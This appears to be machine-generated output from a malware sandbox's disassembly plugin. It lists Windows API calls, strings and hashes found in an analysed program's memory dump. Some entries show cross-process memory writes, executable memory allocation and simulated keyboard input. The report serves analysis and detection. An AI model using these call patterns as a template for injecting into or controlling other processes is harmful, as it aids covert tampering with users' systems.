                                                                                                                                  • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                                                                                                                                  APIs
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EE8371
                                                                                                                                  • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00EE837F
                                                                                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00EE8387
                                                                                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00EE8391
                                                                                                                                  • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00EE83CD
                                                                                                                                  Similarity
                                                                                                                                  • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                  APIs
                                                                                                                                  • CLSIDFromProgID.COMBASE ref: 00EDA874
                                                                                                                                  • ProgIDFromCLSID.COMBASE(?,00000000), ref: 00EDA88F
                                                                                                                                  • lstrcmpiW.KERNEL32(?,00000000), ref: 00EDA89D
                                                                                                                                  • CoTaskMemFree.COMBASE(00000000), ref: 00EDA8AD
                                                                                                                                  • CLSIDFromString.COMBASE(?,?), ref: 00EDA8B9
                                                                                                                                  Similarity
                                                                                                                                  • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                  APIs
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00EDB806
                                                                                                                                  • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00EDB810
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EDB81F
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00EDB826
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00EDB83C
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                  APIs
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00EDB7A5
                                                                                                                                  • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00EDB7AF
                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00EDB7BE
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00EDB7C5
                                                                                                                                  • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00EDB7DB
                                                                                                                                  Similarity
                                                                                                                                  • API ID: HeapInformationToken$AllocateErrorLastProcess
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 47921759-0
                                                                                                                                  APIs
                                                                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00EDFA8F
                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 00EDFAA6
                                                                                                                                  • MessageBeep.USER32(00000000), ref: 00EDFABE
                                                                                                                                  • KillTimer.USER32(?,0000040A), ref: 00EDFADA
                                                                                                                                  • EndDialog.USER32(?,00000001), ref: 00EDFAF4
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3741023627-0
                                                                                                                                  APIs
                                                                                                                                  • EndPath.GDI32(?), ref: 00EBB526
                                                                                                                                  • StrokeAndFillPath.GDI32(?,?,00F1F583,00000000,?), ref: 00EBB542
                                                                                                                                  • SelectObject.GDI32(?,00000000), ref: 00EBB555
                                                                                                                                  • DeleteObject.GDI32 ref: 00EBB568
                                                                                                                                  • StrokePath.GDI32(?), ref: 00EBB583
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2625713937-0
                                                                                                                                  APIs
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00EEFAB2
                                                                                                                                  • CoCreateInstance.COMBASE(00F2DA7C,00000000,00000001,00F2D8EC,?), ref: 00EEFACA
                                                                                                                                    • Part of subcall function 00EACAEE: _memmove.LIBCMT ref: 00EACB2F
                                                                                                                                  • CoUninitialize.COMBASE ref: 00EEFD2D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateInitializeInstanceUninitialize_memmove
                                                                                                                                  • String ID: .lnk
                                                                                                                                  • API String ID: 2683427295-24824748
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID: #$+
                                                                                                                                  • API String ID: 0-2552117581
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,00F3DC40,?,0000000F,0000000C,00000016,00F3DC40,?), ref: 00EE507B
                                                                                                                                    • Part of subcall function 00EA84A6: __swprintf.LIBCMT ref: 00EA84E5
                                                                                                                                    • Part of subcall function 00EA84A6: __itow.LIBCMT ref: 00EA8519
                                                                                                                                    • Part of subcall function 00EAB8A7: _memmove.LIBCMT ref: 00EAB8FB
                                                                                                                                  • CharUpperBuffW.USER32(?,?,00000000,?), ref: 00EE50FB
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper$__itow__swprintf_memmove
                                                                                                                                  • String ID: REMOVE$THIS
                                                                                                                                  • API String ID: 2528338962-776492005
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00EE4D41: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EDC9FE,?,?,00000034,00000800,?,00000034), ref: 00EE4D6B
                                                                                                                                  • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00EDCFC9
                                                                                                                                    • Part of subcall function 00EE4D0C: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00EDCA2D,?,?,00000800,?,00001073,00000000,?,?), ref: 00EE4D36
                                                                                                                                    • Part of subcall function 00EE4C65: GetWindowThreadProcessId.USER32(?,?), ref: 00EE4C90
                                                                                                                                    • Part of subcall function 00EE4C65: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00EDC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00EE4CA0
                                                                                                                                    • Part of subcall function 00EE4C65: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00EDC9C2,00000034,?,?,00001004,00000000,00000000), ref: 00EE4CB6
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EDD036
                                                                                                                                  • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00EDD083
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                                                                  • String ID: @
                                                                                                                                  • API String ID: 4150878124-2766056989
                                                                                                                                  APIs
                                                                                                                                  • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00F3DBF0,00000000,?,?,?,?), ref: 00F0A4E6
                                                                                                                                  • GetWindowLongW.USER32 ref: 00F0A503
                                                                                                                                  • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00F0A513
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$Long
                                                                                                                                  • String ID: SysTreeView32
                                                                                                                                  • API String ID: 847901565-1698111956
                                                                                                                                  • Opcode ID: e23194590d96fd5979cc79be325085ba548b6aa2a6722d7b0e695fdf670f0617
                                                                                                                                  • Instruction ID: 668f7d3c405ffd2fae4a3e1a93d7bef1c312034c1bb48587053899e5bc0f6a64
                                                                                                                                  • Opcode Fuzzy Hash: e23194590d96fd5979cc79be325085ba548b6aa2a6722d7b0e695fdf670f0617
                                                                                                                                  • Instruction Fuzzy Hash: B231AD39600609AFDB219E38CC45BEA7BA9FB49334F244725F875A31E0D770E851BB51
                                                                                                                                  APIs
                                                                                                                                  • _memset.LIBCMT ref: 00EF57E7
                                                                                                                                  • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 00EF581D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CrackInternet_memset
                                                                                                                                  • String ID: ?K$|
                                                                                                                                  • API String ID: 1413715105-747655002
                                                                                                                                  • Opcode ID: add135506051a774a0940e446092b2aa8f0ca8fcce765bc7afef99c2209f601b
                                                                                                                                  • Instruction ID: 3059c7c4195e6ee003ff9c6e876199315f59fc13a825ef6c8d32d5b411c80c14
                                                                                                                                  • Opcode Fuzzy Hash: add135506051a774a0940e446092b2aa8f0ca8fcce765bc7afef99c2209f601b
                                                                                                                                  • Instruction Fuzzy Hash: 92315D72800209EBDF15AFA0CD85EEEBFB8FF19340F105029F915B6162DB319906CB60
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00F0A74F
                                                                                                                                  • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00F0A75D
                                                                                                                                  • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00F0A764
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$DestroyWindow
                                                                                                                                  • String ID: msctls_updown32
                                                                                                                                  • API String ID: 4014797782-2298589950
                                                                                                                                  • Opcode ID: 9d16392287f6e84a3960f187e7ba7dc0bc62390c3594a4d9cdb76eda3645682e
                                                                                                                                  • Instruction ID: 15e229c8e864edc3316bac82357160b19308812eb670149c706531e9ed9a1cb3
                                                                                                                                  • Opcode Fuzzy Hash: 9d16392287f6e84a3960f187e7ba7dc0bc62390c3594a4d9cdb76eda3645682e
                                                                                                                                  • Instruction Fuzzy Hash: AE2192B5600209AFDB10DF64CCC1EA737BDFB5A3A4B144459FA119B291C771EC11EA61
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00F0983D
                                                                                                                                  • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00F0984D
                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00F09872
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$MoveWindow
                                                                                                                                  • String ID: Listbox
                                                                                                                                  • API String ID: 3315199576-2633736733
                                                                                                                                  • Opcode ID: d1b1680bfe4784090f04e025aa5bb585130a9d0783197283b05e342b7c1c5da9
                                                                                                                                  • Instruction ID: cdb0d19285ef8a2ce602ee22c3fcd6b151071d89aec6d203767fecc4a1c37828
                                                                                                                                  • Opcode Fuzzy Hash: d1b1680bfe4784090f04e025aa5bb585130a9d0783197283b05e342b7c1c5da9
                                                                                                                                  • Instruction Fuzzy Hash: E8210732614118BFEF218F54CC85FEB3BAAEF89764F018124F9145B1D1D6B19C51BBA0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00F0A27B
                                                                                                                                  • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00F0A290
                                                                                                                                  • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00F0A29D
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend
                                                                                                                                  • String ID: msctls_trackbar32
                                                                                                                                  • API String ID: 3850602802-1010561917
                                                                                                                                  • Opcode ID: 9f73959dfc25cdac5f94ef8427f64812fe818c18cd2f6fde21e052f02ac05090
                                                                                                                                  • Instruction ID: 83abec3c0eb212a9db4a7751383fa4c6458ab65595a1a390878763fa2b99585f
                                                                                                                                  • Opcode Fuzzy Hash: 9f73959dfc25cdac5f94ef8427f64812fe818c18cd2f6fde21e052f02ac05090
                                                                                                                                  • Instruction Fuzzy Hash: C111E371204308BAEB205F65CC46FE73BA9EF88B64F114128FA55A60D0D272E851FB60
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoInitialize), ref: 00EC2F79
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00EC2F80
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: RoInitialize$combase.dll
                                                                                                                                  • API String ID: 2574300362-340411864
                                                                                                                                  • Opcode ID: 4102480563299b6f192bb0b17c68aaefb4d5b0f257fa75d1981e9a17404375b1
                                                                                                                                  • Instruction ID: e520e828b2a210b93c2f34313a951c462f265c1fa10cd42854056c5ffc9d6d57
                                                                                                                                  • Opcode Fuzzy Hash: 4102480563299b6f192bb0b17c68aaefb4d5b0f257fa75d1981e9a17404375b1
                                                                                                                                  • Instruction Fuzzy Hash: AAE01A7069431CABEB606F70ED4AF563A64B70270AF600428F212E10E0DBF98061FF05
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00EC2F4E), ref: 00EC304E
                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 00EC3055
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                                                                  • API String ID: 2574300362-2819208100
                                                                                                                                  APIs
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: LocalTime__swprintf
                                                                                                                                  • String ID: %.3d$WIN_XPe
                                                                                                                                  • API String ID: 2070861257-2409531811
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00F020EC,?,00F022E0), ref: 00F02104
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetProcessId), ref: 00F02116
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetProcessId$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-399901964
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00EBE6D9,?,00EBE55B,00F3DC28,?,?), ref: 00EBE6F1
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00EBE703
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: IsWow64Process$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-3024904723
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00EBE69C,74DF0AE0,00EBE5AC,00F3DC28,?,?), ref: 00EBE6B4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00EBE6C6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-192647395
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,00EFEBAF,?,00EFEAAC), ref: 00EFEBC7
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 00EFEBD9
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: GetSystemWow64DirectoryW$kernel32.dll
                                                                                                                                  • API String ID: 2574300362-1816364905
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,00000000,00EE1371,?,00EE1519), ref: 00EE13B4
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,UnRegisterTypeLibForUser), ref: 00EE13C6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: UnRegisterTypeLibForUser$oleaut32.dll
                                                                                                                                  • API String ID: 2574300362-1587604923
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(oleaut32.dll,?,00EE135F,?,00EE1440), ref: 00EE1389
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegisterTypeLibForUser), ref: 00EE139B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: RegisterTypeLibForUser$oleaut32.dll
                                                                                                                                  • API String ID: 2574300362-1071820185
                                                                                                                                  APIs
                                                                                                                                  • LoadLibraryA.KERNEL32(advapi32.dll,?,00F03AC2,?,00F03CF7), ref: 00F03ADA
                                                                                                                                  • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00F03AEC
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000001.00000002.4539614460.0000000000EA1000.00000040.00000001.01000000.00000005.sdmp, Offset: 00EA0000, based on PE: true
                                                                                                                                  • Associated: 00000001.00000002.4539301317.0000000000EA0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F4E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F5A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000F74000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4539614460.0000000000FFC000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542232387.0000000001002000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                  • Associated: 00000001.00000002.4542602347.0000000001003000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_1_2_ea0000_UNK_.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                  • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                  • API String ID: 2574300362-4033151799
                                                                                                                                  APIs
                                                                                                                                  • CharUpperBuffW.USER32(00000000,?,00000000,00000001,00000000,00000000,?,?,00000000,?,?,00EF6AA6), ref: 00EAAB2D
                                                                                                                                  • _wcscmp.LIBCMT ref: 00EAAB49
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharUpper_wcscmp
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 820872866-0
                                                                                                                                  APIs
                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00F00D85
                                                                                                                                  • CharLowerBuffW.USER32(?,?), ref: 00F00DC8
                                                                                                                                    • Part of subcall function 00F00458: CharLowerBuffW.USER32(?,?,?,?), ref: 00F00478
                                                                                                                                  • VirtualAlloc.KERNEL32(00000000,00000077,00003000,00000040), ref: 00F00FB2
                                                                                                                                  • _memmove.LIBCMT ref: 00F00FC2
                                                                                                                                  Similarity
                                                                                                                                  • API ID: BuffCharLower$AllocVirtual_memmove
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3659485706-0
                                                                                                                                  APIs
                                                                                                                                  • CoInitialize.OLE32(00000000), ref: 00EFAF56
                                                                                                                                  • CoUninitialize.COMBASE ref: 00EFAF61
                                                                                                                                    • Part of subcall function 00EE1050: CoCreateInstance.COMBASE(?,00000000,00000005,?,?), ref: 00EE10B8
                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 00EFAF6C
                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 00EFB23F
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Variant$ClearCreateInitInitializeInstanceUninitialize
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 780911581-0
                                                                                                                                  APIs
                                                                                                                                  Similarity
                                                                                                                                  • API ID: _memset$__filbuf__getptd_noexit_memcpy_s
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3877424927-0
                                                                                                                                  APIs
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00F0C354
                                                                                                                                  • ScreenToClient.USER32(?,00000002), ref: 00F0C384
                                                                                                                                  • MoveWindow.USER32(00000002,?,?,?,000000FF,00000001,?,00000002,?,?,?,00000002,?,?), ref: 00F0C3EA
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ClientMoveRectScreen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3880355969-0
                                                                                                                                  APIs
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00EDD258
                                                                                                                                  • __itow.LIBCMT ref: 00EDD292
                                                                                                                                    • Part of subcall function 00EDD4DE: SendMessageW.USER32(?,0000113E,00000000,00000000), ref: 00EDD549
                                                                                                                                  • SendMessageW.USER32(?,0000110A,00000001,?), ref: 00EDD2FB
                                                                                                                                  • __itow.LIBCMT ref: 00EDD350
                                                                                                                                  Similarity
                                                                                                                                  • API ID: MessageSend$__itow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3379773720-0
                                                                                                                                  APIs
                                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000), ref: 00EEEF32
                                                                                                                                  • GetLastError.KERNEL32(?,00000000), ref: 00EEEF58
                                                                                                                                  • DeleteFileW.KERNEL32(00000002,?,00000000), ref: 00EEEF7D
                                                                                                                                  • CreateHardLinkW.KERNEL32(00000002,?,00000000,?,00000000), ref: 00EEEFA9
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateHardLink$DeleteErrorFileLast
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3321077145-0
                                                                                                                                  APIs
                                                                                                                                  • InvalidateRect.USER32(?,00000000,00000001,?,?,?), ref: 00F0B3E1
                                                                                                                                  Similarity
                                                                                                                                  • API ID: InvalidateRect
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 634782764-0
                                                                                                                                  APIs
                                                                                                                                  • ClientToScreen.USER32(?,?), ref: 00F0D617
                                                                                                                                  • GetWindowRect.USER32(?,?), ref: 00F0D68D
                                                                                                                                  • PtInRect.USER32(?,?,00F0EB2C), ref: 00F0D69D
                                                                                                                                  • MessageBeep.USER32(00000000), ref: 00F0D70E
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Rect$BeepClientMessageScreenWindow
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1352109105-0
                                                                                                                                  APIs
                                                                                                                                  • GetKeyboardState.USER32(?,75C0C0D0,?,00008000), ref: 00EE44EE
                                                                                                                                  • SetKeyboardState.USER32(00000080,?,00008000), ref: 00EE450A
                                                                                                                                  • PostMessageW.USER32(00000000,00000101,00000000,?), ref: 00EE456A
                                                                                                                                  • SendInput.USER32(00000001,?,0000001C,75C0C0D0,?,00008000), ref: 00EE45C8
                                                                                                                                  Similarity
                                                                                                                                  • API ID: KeyboardState$InputMessagePostSend
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 432972143-0
                                                                                                                                  APIs
                                                                                                                                  • _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 00ED4DE8
                                                                                                                                  • __isleadbyte_l.LIBCMT ref: 00ED4E16
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00ED4E44
                                                                                                                                  • MultiByteToWideChar.KERNEL32(00000080,00000009,00000002,00000001,?,00000000,?,00000000,?,?,?), ref: 00ED4E7A
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3058430110-0
                                                                                                                                  APIs
                                                                                                                                  • GetForegroundWindow.USER32 ref: 00F07AB6
                                                                                                                                    • Part of subcall function 00EE69C9: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EE69E3
                                                                                                                                    • Part of subcall function 00EE69C9: GetCurrentThreadId.KERNEL32 ref: 00EE69EA
                                                                                                                                    • Part of subcall function 00EE69C9: AttachThreadInput.USER32(00000000,?,00EE8127), ref: 00EE69F1
                                                                                                                                  • GetCaretPos.USER32(?), ref: 00F07AC7
                                                                                                                                  • ClientToScreen.USER32(00000000,?), ref: 00F07B00
                                                                                                                                  • GetForegroundWindow.USER32 ref: 00F07B06
